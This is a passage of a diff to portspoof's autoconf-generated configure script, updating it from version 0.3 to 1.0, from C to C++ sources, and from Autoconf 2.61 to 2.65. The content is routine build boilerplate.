2>/dev/null fi -echo >conf$$.file -if ln -s conf$$.file conf$$ 2>/dev/null; then - as_ln_s='ln -s' - # ... but there are two gotchas: - # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. - # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. - # In both cases, we have to default to `cp -p'. - ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || +if (echo >conf$$.file) 2>/dev/null; then + if ln -s conf$$.file conf$$ 2>/dev/null; then + as_ln_s='ln -s' + # ... but there are two gotchas: + # 1) On MSYS, both `ln -s file dir' and `ln file dir' fail. + # 2) DJGPP < 2.04 has no symlinks; `ln -s' creates a wrapper executable. + # In both cases, we have to default to `cp -p'. + ln -s conf$$.file conf$$.dir 2>/dev/null && test ! -f conf$$.exe || + as_ln_s='cp -p' + elif ln conf$$.file conf$$ 2>/dev/null; then + as_ln_s=ln + else as_ln_s='cp -p' -elif ln conf$$.file conf$$ 2>/dev/null; then - as_ln_s=ln + fi else as_ln_s='cp -p' fi @@ -514,7 +493,7 @@ rm -f conf$$ conf$$.exe conf$$.dir/conf$$.file conf$$.file rmdir conf$$.dir 2>/dev/null if mkdir -p . 2>/dev/null; then - as_mkdir_p=: + as_mkdir_p='mkdir -p "$as_dir"' else test -d ./-p && rmdir ./-p as_mkdir_p=false @@ -531,12 +510,12 @@ else as_test_x=' eval sh -c '\'' if test -d "$1"; then - test -d "$1/."; + test -d "$1/."; else - case $1 in - -*)set "./$1";; + case $1 in #( + -*)set "./$1";; esac; - case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in + case `ls -ld'$as_ls_L_option' "$1" 2>/dev/null` in #(( ???[sx]*):;;*)false;;esac;fi '\'' sh ' @@ -550,8 +529,8 @@ as_tr_cpp="eval sed 'y%*$as_cr_letters%P$as_cr_LETTERS%;s%[^_$as_cr_alnum]%_%g'" as_tr_sh="eval sed 'y%*+%pp%;s%[^_$as_cr_alnum]%_%g'" - -exec 7<&0 &1 +test -n "$DJDIR" || exec 7<&0 &1 # Name of the host. # hostname on some systems (SVR3.2, Linux) returns a bogus exit status, @@ -569,16 +548,16 @@ cross_compiling=no subdirs= MFLAGS= MAKEFLAGS= -SHELL=${CONFIG_SHELL-/bin/sh} # Identity of this package. PACKAGE_NAME='portspoof' PACKAGE_TARNAME='portspoof' -PACKAGE_VERSION='0.3' -PACKAGE_STRING='portspoof 0.3' -PACKAGE_BUGREPORT='piotr@duszynski.eu' +PACKAGE_VERSION='1.0' +PACKAGE_STRING='portspoof 1.0' +PACKAGE_BUGREPORT='piotratduszynski.eu' +PACKAGE_URL='' -ac_unique_file="src/portspoof.c" +ac_unique_file="src/Portspoof.cpp" # Factoring default headers for most tests. ac_includes_default="\ #include @@ -615,109 +594,128 @@ ac_includes_default="\ # include #endif" -ac_subst_vars='SHELL -PATH_SEPARATOR -PACKAGE_NAME -PACKAGE_TARNAME -PACKAGE_VERSION -PACKAGE_STRING -PACKAGE_BUGREPORT -exec_prefix -prefix -program_transform_name -bindir -sbindir -libexecdir -datarootdir -datadir -sysconfdir -sharedstatedir -localstatedir -includedir -oldincludedir -docdir -infodir -htmldir -dvidir -pdfdir -psdir -libdir -localedir -mandir -DEFS -ECHO_C -ECHO_N -ECHO_T -LIBS -build_alias -host_alias -target_alias -INSTALL_PROGRAM -INSTALL_SCRIPT -INSTALL_DATA -am__isrc -CYGPATH_W -PACKAGE -VERSION -ACLOCAL -AUTOCONF -AUTOMAKE -AUTOHEADER -MAKEINFO -install_sh -STRIP -INSTALL_STRIP_PROGRAM -mkdir_p -AWK -SET_MAKE -am__leading_dot -AMTAR -am__tar -am__untar -build -build_cpu -build_vendor -build_os -host -host_cpu -host_vendor -host_os -CC -CFLAGS -LDFLAGS -CPPFLAGS -ac_ct_CC -EXEEXT -OBJEXT -DEPDIR -am__include -am__quote -AMDEP_TRUE -AMDEP_FALSE -AMDEPBACKSLASH -CCDEPMODE -am__fastdepCC_TRUE -am__fastdepCC_FALSE -CPP -GREP -EGREP +ac_subst_vars='am__EXEEXT_FALSE +am__EXEEXT_TRUE +LTLIBOBJS LIBOBJS -LTLIBOBJS' +EGREP +GREP +CPP +am__fastdepCC_FALSE +am__fastdepCC_TRUE +CCDEPMODE +ac_ct_CC +CFLAGS +CC +am__fastdepCXX_FALSE +am__fastdepCXX_TRUE +CXXDEPMODE +AMDEPBACKSLASH +AMDEP_FALSE +AMDEP_TRUE +am__quote +am__include +DEPDIR +OBJEXT +EXEEXT +ac_ct_CXX +CPPFLAGS +LDFLAGS +CXXFLAGS +CXX +host_os +host_vendor +host_cpu +host +build_os +build_vendor +build_cpu +build +am__untar +am__tar +AMTAR +am__leading_dot +SET_MAKE +AWK +mkdir_p +MKDIR_P +INSTALL_STRIP_PROGRAM +STRIP +install_sh +MAKEINFO +AUTOHEADER +AUTOMAKE +AUTOCONF +ACLOCAL +VERSION +PACKAGE +CYGPATH_W +am__isrc +INSTALL_DATA +INSTALL_SCRIPT +INSTALL_PROGRAM +target_alias +host_alias +build_alias +LIBS +ECHO_T +ECHO_N +ECHO_C +DEFS +mandir +localedir +libdir +psdir +pdfdir +dvidir +htmldir +infodir +docdir +oldincludedir +includedir +localstatedir +sharedstatedir +sysconfdir +datadir +datarootdir +libexecdir +sbindir +bindir +program_transform_name +prefix +exec_prefix +PACKAGE_URL +PACKAGE_BUGREPORT +PACKAGE_STRING +PACKAGE_VERSION +PACKAGE_TARNAME +PACKAGE_NAME +PATH_SEPARATOR +SHELL' ac_subst_files='' +ac_user_opts=' +enable_option_checking +enable_dependency_tracking +' ac_precious_vars='build_alias host_alias target_alias -CC -CFLAGS +CXX +CXXFLAGS LDFLAGS LIBS CPPFLAGS +CCC +CC +CFLAGS CPP' # Initialize some variables set by options. ac_init_help= ac_init_version=false +ac_unrecognized_opts= +ac_unrecognized_sep= # The variables have the same names as the options, with # dashes changed to underlines. cache_file=/dev/null @@ -816,13 +814,20 @@ do datarootdir=$ac_optarg ;; -disable-* | --disable-*) - ac_feature=`expr "x$ac_option" : 'x-*disable-\(.*\)'` + ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'` # Reject names that are not valid shell variable names. - expr "x$ac_feature" : ".*[^-._$as_cr_alnum]" >/dev/null && - { echo "$as_me: error: invalid feature name: $ac_feature" >&2 - { (exit 1); exit 1; }; } - ac_feature=`echo $ac_feature | sed 's/[-.]/_/g'` - eval enable_$ac_feature=no ;; + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid feature name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"enable_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--disable-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval enable_$ac_useropt=no ;; -docdir | --docdir | --docdi | --doc | --do) ac_prev=docdir ;; @@ -835,13 +840,20 @@ do dvidir=$ac_optarg ;; -enable-* | --enable-*) - ac_feature=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` + ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'` # Reject names that are not valid shell variable names. - expr "x$ac_feature" : ".*[^-._$as_cr_alnum]" >/dev/null && - { echo "$as_me: error: invalid feature name: $ac_feature" >&2 - { (exit 1); exit 1; }; } - ac_feature=`echo $ac_feature | sed 's/[-.]/_/g'` - eval enable_$ac_feature=\$ac_optarg ;; + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid feature name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"enable_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--enable-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval enable_$ac_useropt=\$ac_optarg ;; -exec-prefix | --exec_prefix | --exec-prefix | --exec-prefi \ | --exec-pref | --exec-pre | --exec-pr | --exec-p | --exec- \ @@ -1032,22 +1044,36 @@ do ac_init_version=: ;; -with-* | --with-*) - ac_package=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` + ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'` # Reject names that are not valid shell variable names. - expr "x$ac_package" : ".*[^-._$as_cr_alnum]" >/dev/null && - { echo "$as_me: error: invalid package name: $ac_package" >&2 - { (exit 1); exit 1; }; } - ac_package=`echo $ac_package | sed 's/[-.]/_/g'` - eval with_$ac_package=\$ac_optarg ;; + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid package name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"with_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--with-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval with_$ac_useropt=\$ac_optarg ;; -without-* | --without-*) - ac_package=`expr "x$ac_option" : 'x-*without-\(.*\)'` + ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'` # Reject names that are not valid shell variable names. - expr "x$ac_package" : ".*[^-._$as_cr_alnum]" >/dev/null && - { echo "$as_me: error: invalid package name: $ac_package" >&2 - { (exit 1); exit 1; }; } - ac_package=`echo $ac_package | sed 's/[-.]/_/g'` - eval with_$ac_package=no ;; + expr "x$ac_useropt" : ".*[^-+._$as_cr_alnum]" >/dev/null && + as_fn_error "invalid package name: $ac_useropt" + ac_useropt_orig=$ac_useropt + ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'` + case $ac_user_opts in + *" +"with_$ac_useropt" +"*) ;; + *) ac_unrecognized_opts="$ac_unrecognized_opts$ac_unrecognized_sep--without-$ac_useropt_orig" + ac_unrecognized_sep=', ';; + esac + eval with_$ac_useropt=no ;; --x) # Obsolete; use --with-x. @@ -1067,25 +1093,25 @@ do | --x-librar=* | --x-libra=* | --x-libr=* | --x-lib=* | --x-li=* | --x-l=*) x_libraries=$ac_optarg ;; - -*) { echo "$as_me: error: unrecognized option: $ac_option -Try \`$0 --help' for more information." >&2 - { (exit 1); exit 1; }; } + -*) as_fn_error "unrecognized option: \`$ac_option' +Try \`$0 --help' for more information." ;; *=*) ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='` # Reject names that are not valid shell variable names. - expr "x$ac_envvar" : ".*[^_$as_cr_alnum]" >/dev/null && - { echo "$as_me: error: invalid variable name: $ac_envvar" >&2 - { (exit 1); exit 1; }; } + case $ac_envvar in #( + '' | [0-9]* | *[!_$as_cr_alnum]* ) + as_fn_error "invalid variable name: \`$ac_envvar'" ;; + esac eval $ac_envvar=\$ac_optarg export $ac_envvar ;; *) # FIXME: should be removed in autoconf 3.0. - echo "$as_me: WARNING: you should use --build, --host, --target" >&2 + $as_echo "$as_me: WARNING: you should use --build, --host, --target" >&2 expr "x$ac_option" : ".*[^-._$as_cr_alnum]" >/dev/null && - echo "$as_me: WARNING: invalid host type: $ac_option" >&2 + $as_echo "$as_me: WARNING: invalid host type: $ac_option" >&2 : ${build_alias=$ac_option} ${host_alias=$ac_option} ${target_alias=$ac_option} ;; @@ -1094,23 +1120,36 @@ done if test -n "$ac_prev"; then ac_option=--`echo $ac_prev | sed 's/_/-/g'` - { echo "$as_me: error: missing argument to $ac_option" >&2 - { (exit 1); exit 1; }; } + as_fn_error "missing argument to $ac_option" fi -# Be sure to have absolute directory names. +if test -n "$ac_unrecognized_opts"; then + case $enable_option_checking in + no) ;; + fatal) as_fn_error "unrecognized options: $ac_unrecognized_opts" ;; + *) $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2 ;; + esac +fi + +# Check all directory arguments for consistency. for ac_var in exec_prefix prefix bindir sbindir libexecdir datarootdir \ datadir sysconfdir sharedstatedir localstatedir includedir \ oldincludedir docdir infodir htmldir dvidir pdfdir psdir \ libdir localedir mandir do eval ac_val=\$$ac_var + # Remove trailing slashes. + case $ac_val in + */ ) + ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'` + eval $ac_var=\$ac_val;; + esac + # Be sure to have absolute directory names. case $ac_val in [\\/$]* | ?:[\\/]* ) continue;; NONE | '' ) case $ac_var in *prefix ) continue;; esac;; esac - { echo "$as_me: error: expected an absolute directory name for --$ac_var: $ac_val" >&2 - { (exit 1); exit 1; }; } + as_fn_error "expected an absolute directory name for --$ac_var: $ac_val" done # There might be people who depend on the old broken behavior: `$host' @@ -1124,7 +1163,7 @@ target=$target_alias if test "x$host_alias" != x; then if test "x$build_alias" = x; then cross_compiling=maybe - echo "$as_me: WARNING: If you wanted to set the --build type, don't use --host. + $as_echo "$as_me: WARNING: If you wanted to set the --build type, don't use --host. If a cross compiler is detected then cross compile mode will be used." >&2 elif test "x$build_alias" != "x$host_alias"; then cross_compiling=yes @@ -1140,23 +1179,21 @@ test "$silent" = yes && exec 6>/dev/null ac_pwd=`pwd` && test -n "$ac_pwd" && ac_ls_di=`ls -di .` && ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` || - { echo "$as_me: error: Working directory cannot be determined" >&2 - { (exit 1); exit 1; }; } + as_fn_error "working directory cannot be determined" test "X$ac_ls_di" = "X$ac_pwd_ls_di" || - { echo "$as_me: error: pwd does not report name of working directory" >&2 - { (exit 1); exit 1; }; } + as_fn_error "pwd does not report name of working directory" # Find the source files, if location was not specified. if test -z "$srcdir"; then ac_srcdir_defaulted=yes # Try the directory containing this script, then the parent directory. - ac_confdir=`$as_dirname -- "$0" || -$as_expr X"$0" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ - X"$0" : 'X\(//\)[^/]' \| \ - X"$0" : 'X\(//\)$' \| \ - X"$0" : 'X\(/\)' \| . 2>/dev/null || -echo X"$0" | + ac_confdir=`$as_dirname -- "$as_myself" || +$as_expr X"$as_myself" : 'X\(.*[^/]\)//*[^/][^/]*/*$' \| \ + X"$as_myself" : 'X\(//\)[^/]' \| \ + X"$as_myself" : 'X\(//\)$' \| \ + X"$as_myself" : 'X\(/\)' \| . 2>/dev/null || +$as_echo X"$as_myself" | sed '/^X\(.*[^/]\)\/\/*[^/][^/]*\/*$/{ s//\1/ q @@ -1183,13 +1220,11 @@ else fi if test ! -r "$srcdir/$ac_unique_file"; then test "$ac_srcdir_defaulted" = yes && srcdir="$ac_confdir or .." - { echo "$as_me: error: cannot find sources ($ac_unique_file) in $srcdir" >&2 - { (exit 1); exit 1; }; } + as_fn_error "cannot find sources ($ac_unique_file) in $srcdir" fi ac_msg="sources are in $srcdir, but \`cd $srcdir' does not work" ac_abs_confdir=`( - cd "$srcdir" && test -r "./$ac_unique_file" || { echo "$as_me: error: $ac_msg" >&2 - { (exit 1); exit 1; }; } + cd "$srcdir" && test -r "./$ac_unique_file" || as_fn_error "$ac_msg" pwd)` # When building in place, set srcdir=. if test "$ac_abs_confdir" = "$ac_pwd"; then @@ -1215,7 +1250,7 @@ if test "$ac_init_help" = "long"; then # Omit some internal or obsolete options to make the list less imposing. # This message is too long to be a string in the A/UX 3.1 sh. cat <<_ACEOF -\`configure' configures portspoof 0.3 to adapt to many kinds of systems. +\`configure' configures portspoof 1.0 to adapt to many kinds of systems. Usage: $0 [OPTION]... [VAR=VALUE]... @@ -1237,9 +1272,9 @@ Configuration: Installation directories: --prefix=PREFIX install architecture-independent files in PREFIX - [$ac_default_prefix] + [$ac_default_prefix] --exec-prefix=EPREFIX install architecture-dependent files in EPREFIX - [PREFIX] + [PREFIX] By default, \`make install' will install all the files in \`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc. You can specify @@ -1249,25 +1284,25 @@ for instance \`--prefix=\$HOME'. For better control, use the options below. Fine tuning of the installation directories: - --bindir=DIR user executables [EPREFIX/bin] - --sbindir=DIR system admin executables [EPREFIX/sbin] - --libexecdir=DIR program executables [EPREFIX/libexec] - --sysconfdir=DIR read-only single-machine data [PREFIX/etc] - --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] - --localstatedir=DIR modifiable single-machine data [PREFIX/var] - --libdir=DIR object code libraries [EPREFIX/lib] - --includedir=DIR C header files [PREFIX/include] - --oldincludedir=DIR C header files for non-gcc [/usr/include] - --datarootdir=DIR read-only arch.-independent data root [PREFIX/share] - --datadir=DIR read-only architecture-independent data [DATAROOTDIR] - --infodir=DIR info documentation [DATAROOTDIR/info] - --localedir=DIR locale-dependent data [DATAROOTDIR/locale] - --mandir=DIR man documentation [DATAROOTDIR/man] - --docdir=DIR documentation root [DATAROOTDIR/doc/portspoof] - --htmldir=DIR html documentation [DOCDIR] - --dvidir=DIR dvi documentation [DOCDIR] - --pdfdir=DIR pdf documentation [DOCDIR] - --psdir=DIR ps documentation [DOCDIR] + --bindir=DIR user executables [EPREFIX/bin] + --sbindir=DIR system admin executables [EPREFIX/sbin] + --libexecdir=DIR program executables [EPREFIX/libexec] + --sysconfdir=DIR read-only single-machine data [PREFIX/etc] + --sharedstatedir=DIR modifiable architecture-independent data [PREFIX/com] + --localstatedir=DIR modifiable single-machine data [PREFIX/var] + --libdir=DIR object code libraries [EPREFIX/lib] + --includedir=DIR C header files [PREFIX/include] + --oldincludedir=DIR C header files for non-gcc [/usr/include] + --datarootdir=DIR read-only arch.-independent data root [PREFIX/share] + --datadir=DIR read-only architecture-independent data [DATAROOTDIR] + --infodir=DIR info documentation [DATAROOTDIR/info] + --localedir=DIR locale-dependent data [DATAROOTDIR/locale] + --mandir=DIR man documentation [DATAROOTDIR/man] + --docdir=DIR documentation root [DATAROOTDIR/doc/portspoof] + --htmldir=DIR html documentation [DOCDIR] + --dvidir=DIR dvi documentation [DOCDIR] + --pdfdir=DIR pdf documentation [DOCDIR] + --psdir=DIR ps documentation [DOCDIR] _ACEOF cat <<\_ACEOF @@ -1285,30 +1320,33 @@ fi if test -n "$ac_init_help"; then case $ac_init_help in - short | recursive ) echo "Configuration of portspoof 0.3:";; + short | recursive ) echo "Configuration of portspoof 1.0:";; esac cat <<\_ACEOF Optional Features: + --disable-option-checking ignore unrecognized --enable/--with options --disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no) --enable-FEATURE[=ARG] include FEATURE [ARG=yes] --disable-dependency-tracking speeds up one-time build --enable-dependency-tracking do not reject slow dependency extractors Some influential environment variables: - CC C compiler command - CFLAGS C compiler flags + CXX C++ compiler command + CXXFLAGS C++ compiler flags LDFLAGS linker flags, e.g. -L if you have libraries in a nonstandard directory LIBS libraries to pass to the linker, e.g. -l - CPPFLAGS C/C++/Objective C preprocessor flags, e.g. -I if + CPPFLAGS (Objective) C/C++ preprocessor flags, e.g. -I if you have headers in a nonstandard directory + CC C compiler command + CFLAGS C compiler flags CPP C preprocessor Use these variables to override the choices made by `configure' or to help it to find libraries and programs with nonstandard names/locations. -Report bugs to . +Report bugs to . _ACEOF ac_status=$? fi @@ -1316,15 +1354,17 @@ fi if test "$ac_init_help" = "recursive"; then # If there are subdirs, report their specific --help. for ac_dir in : $ac_subdirs_all; do test "x$ac_dir" = x: && continue - test -d "$ac_dir" || continue + test -d "$ac_dir" || + { cd "$srcdir" && ac_pwd=`pwd` && srcdir=. && test -d "$ac_dir"; } || + continue ac_builddir=. case "$ac_dir" in .) ac_dir_suffix= ac_top_builddir_sub=. ac_top_build_prefix= ;; *) - ac_dir_suffix=/`echo "$ac_dir" | sed 's,^\.[\\/],,'` + ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'` # A ".." for each directory in $ac_dir_suffix. - ac_top_builddir_sub=`echo "$ac_dir_suffix" | sed 's,/[^\\/]*,/..,g;s,/,,'` + ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'` case $ac_top_builddir_sub in "") ac_top_builddir_sub=. ac_top_build_prefix= ;; *) ac_top_build_prefix=$ac_top_builddir_sub/ ;; @@ -1360,7 +1400,7 @@ ac_abs_srcdir=$ac_abs_top_srcdir$ac_dir_suffix echo && $SHELL "$ac_srcdir/configure" --help=recursive else - echo "$as_me: WARNING: no configuration information is in $ac_dir" >&2 + $as_echo "$as_me: WARNING: no configuration information is in $ac_dir" >&2 fi || ac_status=$? cd "$ac_pwd" || { ac_status=$?; break; } done @@ -1369,22 +1409,471 @@ fi test -n "$ac_init_help" && exit $ac_status if $ac_init_version; then cat <<\_ACEOF -portspoof configure 0.3 -generated by GNU Autoconf 2.61 +portspoof configure 1.0 +generated by GNU Autoconf 2.65 -Copyright (C) 1992, 1993, 1994, 1995, 1996, 1998, 1999, 2000, 2001, -2002, 2003, 2004, 2005, 2006 Free Software Foundation, Inc. +Copyright (C) 2009 Free Software Foundation, Inc. This configure script is free software; the Free Software Foundation gives unlimited permission to copy, distribute and modify it. _ACEOF exit fi + +## ------------------------ ## +## Autoconf initialization. ## +## ------------------------ ## + +# ac_fn_cxx_try_compile LINENO +# ---------------------------- +# Try to compile conftest.$ac_ext, and return whether this succeeded. +ac_fn_cxx_try_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext + if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_cxx_werror_flag" || + test ! -s conftest.err + } && test -s conftest.$ac_objext; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} # ac_fn_cxx_try_compile + +# ac_fn_c_try_compile LINENO +# -------------------------- +# Try to compile conftest.$ac_ext, and return whether this succeeded. +ac_fn_c_try_compile () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + rm -f conftest.$ac_objext + if { { ac_try="$ac_compile" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_compile") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { + test -z "$ac_c_werror_flag" || + test ! -s conftest.err + } && test -s conftest.$ac_objext; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} # ac_fn_c_try_compile + +# ac_fn_c_try_cpp LINENO +# ---------------------- +# Try to preprocess conftest.$ac_ext, and return whether this succeeded. +ac_fn_c_try_cpp () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { { ac_try="$ac_cpp conftest.$ac_ext" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_cpp conftest.$ac_ext") 2>conftest.err + ac_status=$? + if test -s conftest.err; then + grep -v '^ *+' conftest.err >conftest.er1 + cat conftest.er1 >&5 + mv -f conftest.er1 conftest.err + fi + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } >/dev/null && { + test -z "$ac_c_preproc_warn_flag$ac_c_werror_flag" || + test ! -s conftest.err + }; then : + ac_retval=0 +else + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=1 +fi + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} # ac_fn_c_try_cpp + +# ac_fn_c_try_run LINENO +# ---------------------- +# Try to link conftest.$ac_ext, and return whether this succeeded. Assumes +# that executables *can* be run. +ac_fn_c_try_run () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { { ac_try="$ac_link" +case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_link") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; } && { ac_try='./conftest$ac_exeext' + { { case "(($ac_try" in + *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; + *) ac_try_echo=$ac_try;; +esac +eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" +$as_echo "$ac_try_echo"; } >&5 + (eval "$ac_try") 2>&5 + ac_status=$? + $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 + test $ac_status = 0; }; }; then : + ac_retval=0 +else + $as_echo "$as_me: program exited with status $ac_status" >&5 + $as_echo "$as_me: failed program was:" >&5 +sed 's/^/| /' conftest.$ac_ext >&5 + + ac_retval=$ac_status +fi + rm -rf conftest.dSYM conftest_ipa8_conftest.oo + eval $as_lineno_stack; test "x$as_lineno_stack" = x && { as_lineno=; unset as_lineno;} + as_fn_set_status $ac_retval + +} # ac_fn_c_try_run + +# ac_fn_c_check_header_mongrel LINENO HEADER VAR INCLUDES +# ------------------------------------------------------- +# Tests whether HEADER exists, giving a warning if it cannot be compiled using +# the include files in INCLUDES and setting the cache variable VAR +# accordingly. +ac_fn_c_check_header_mongrel () +{ + as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack + if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $2" >&5 +$as_echo_n "checking for $2... " >&6; } +if { as_var=$3; eval "test \"\${$as_var+set}\" = set"; }; then : + $as_echo_n "(cached) " >&6 +fi +eval ac_res=\$$3 + { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_res" >&5 +$as_echo "$ac_res" >&6; } +else + # Is the header compilable? +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 usability" >&5 +$as_echo_n "checking $2 usability... " >&6; } +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +$4 +#include <$2> +_ACEOF +if ac_fn_c_try_compile "$LINENO"; then : + ac_header_compiler=yes +else + ac_header_compiler=no +fi +rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_compiler" >&5 +$as_echo "$ac_header_compiler" >&6; } + +# Is the header present? +{ $as_echo "$as_me:${as_lineno-$LINENO}: checking $2 presence" >&5 +$as_echo_n "checking $2 presence... " >&6; } +cat confdefs.h - <<_ACEOF >conftest.$ac_ext +/* end confdefs.h. */ +#include <$2> +_ACEOF +if ac_fn_c_try_cpp "$LINENO"; then : + ac_header_preproc=yes +else + ac_header_preproc=no +fi +rm -f conftest.err conftest.$ac_ext +{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_header_preproc" >&5 +$as_echo "$ac_header_preproc" >&6; } + +# So? What about this header? +case $ac_header_compiler:$ac_header_preproc:$ac_c_preproc_warn_flag in #(( + yes:no: ) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&5 +$as_echo "$as_me: WARNING: $2: accepted by the compiler, rejected by the preprocessor!" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 +$as_echo "$as_me: WARNING: $2: proceeding with the compiler's result" >&2;} + ;; + no:yes:* ) + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: present but cannot be compiled" >&5 +$as_echo "$as_me: WARNING: $2: present but cannot be compiled" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: check for missing prerequisite headers?" >&5 +$as_echo "$as_me: WARNING: $2: check for missing prerequisite headers?" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: see the Autoconf documentation" >&5 +$as_echo "$as_me: WARNING: $2: see the Autoconf documentation" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&5 +$as_echo "$as_me: WARNING: $2: section \"Present But Cannot Be Compiled\"" >&2;} + { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: $2: proceeding with the compiler's result" >&5 +$as_echo 